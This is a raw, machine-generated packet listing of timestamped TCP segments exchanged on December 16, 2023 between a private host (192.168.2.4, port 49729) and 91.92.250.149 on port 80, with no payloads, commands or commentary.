                                                                                        Dec 16, 2023 18:16:57.444645882 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444679976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444715977 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444747925 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444782972 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444807053 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444838047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444968939 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445003033 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445074081 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445111036 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445127964 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445158958 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445242882 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445277929 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445421934 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445456028 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445477009 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445509911 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445533991 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445565939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445626974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445660114 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445847034 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445878983 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.445933104 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.445969105 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446028948 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446063042 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446074009 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446109056 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446130037 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446178913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446197987 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446228981 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446248055 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446279049 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446300983 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446332932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446388960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446420908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446472883 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446507931 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446537971 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446572065 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446583033 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446613073 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446655035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446686029 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446753025 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446785927 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446805954 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446837902 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446855068 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446887016 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446896076 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446928024 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.446950912 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.446986914 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447005033 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447038889 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447061062 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447097063 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447108984 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447145939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447158098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447191954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447232962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447263002 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447406054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447437048 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447468042 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447499990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447530031 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447563887 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447586060 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447617054 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447638035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447669029 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447691917 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447725058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447751045 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447788954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.447803020 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.447835922 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448012114 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448044062 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448251009 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448283911 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448323011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448358059 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448462009 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448498964 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448520899 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448609114 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448632956 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448646069 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448657036 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448687077 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448707104 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448741913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448757887 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448790073 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448892117 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.448925018 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.448988914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449021101 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449070930 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449103117 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449157000 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449188948 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449249983 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449282885 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449311972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449345112 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449400902 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449470997 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449475050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449510098 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449553013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449594021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449631929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449660063 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449719906 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449752092 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449800968 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449832916 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449888945 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.449932098 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.449970961 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450006962 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450069904 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450105906 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450155020 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450191021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450225115 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450258017 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450318098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450356960 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450407028 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450443029 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450450897 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450483084 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450576067 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450608969 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450671911 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450705051 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450727940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450758934 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450789928 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450825930 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450841904 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450871944 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450894117 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450927973 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.450962067 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.450994015 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451015949 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451045990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451065063 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451097965 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451114893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451147079 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451181889 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451215982 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451231956 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451267958 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451360941 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451392889 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451423883 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451458931 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451477051 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451509953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451541901 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451575994 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451715946 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451750040 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451759100 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451795101 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451808929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451839924 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451860905 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451891899 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451911926 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.451944113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.451976061 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452006102 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452064037 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452094078 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452116013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452147961 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452178955 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452210903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452222109 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452251911 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452303886 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452341080 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452362061 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452394009 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452425957 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452455997 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452536106 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452565908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452675104 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452703953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452739000 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452774048 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452790976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452821016 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.452868938 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.452900887 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681400061 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681446075 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681458950 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681472063 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681483984 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681483984 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681521893 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681521893 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681529045 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681541920 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681564093 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681572914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681585073 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681602001 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681606054 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681636095 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681700945 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681715012 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681736946 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681751013 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681806087 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681821108 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.681842089 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.681854010 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682071924 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682084084 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682101965 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682115078 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682585955 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682626963 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682630062 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682662010 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682674885 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682687998 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682699919 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682704926 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682723999 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682732105 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682739019 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682769060 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682821989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682854891 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.682862043 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.682892084 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683015108 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683027029 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683047056 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683062077 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683176041 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683188915 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683222055 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683336973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683377028 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683455944 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683495045 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683607101 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683619022 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683645964 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683659077 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683666945 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683689117 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683772087 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683804989 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683828115 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683840990 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683861017 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683875084 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683947086 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.683980942 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.683981895 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684012890 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684045076 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684079885 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684096098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684128046 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684223890 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684237003 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684256077 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684278965 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684307098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684319973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684343100 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684362888 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684484959 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684499025 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684515953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684531927 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684890985 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684915066 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684930086 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684947968 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.684952021 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.684984922 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685003042 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685034037 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685056925 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685069084 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685086966 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685106993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685278893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685291052 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685323954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685524940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685538054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685564041 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685575008 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685641050 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685652971 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685678959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685837984 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685874939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.685897112 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.685925961 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.686053991 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.686065912 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.686089993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.686106920 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.686119080 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.686131001 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.686153889 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.686176062 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.686316013 CET804972991.92.250.149192.168.2.4
